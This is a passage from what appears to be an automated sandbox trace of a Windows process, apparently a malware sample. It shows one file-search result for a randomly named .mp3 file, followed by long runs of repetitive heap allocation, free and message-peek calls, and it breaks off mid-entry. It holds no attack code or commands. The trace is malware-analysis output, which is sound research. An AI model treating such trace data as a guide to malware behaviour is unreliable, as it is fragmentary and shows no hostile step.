ftLastWriteTime.dwLowDateTime=0x2fb8e6d0, ftLastWriteTime.dwHighDateTime=0x1d5dec8, nFileSizeHigh=0x0, nFileSizeLow=0x10b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v_kH3lt3CLNkfkofloR.mp3", cAlternateFileName="V_KH3L~1.MP3")) returned 0 [0171.670] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0171.670] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0171.670] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.679] HeapFree (in: 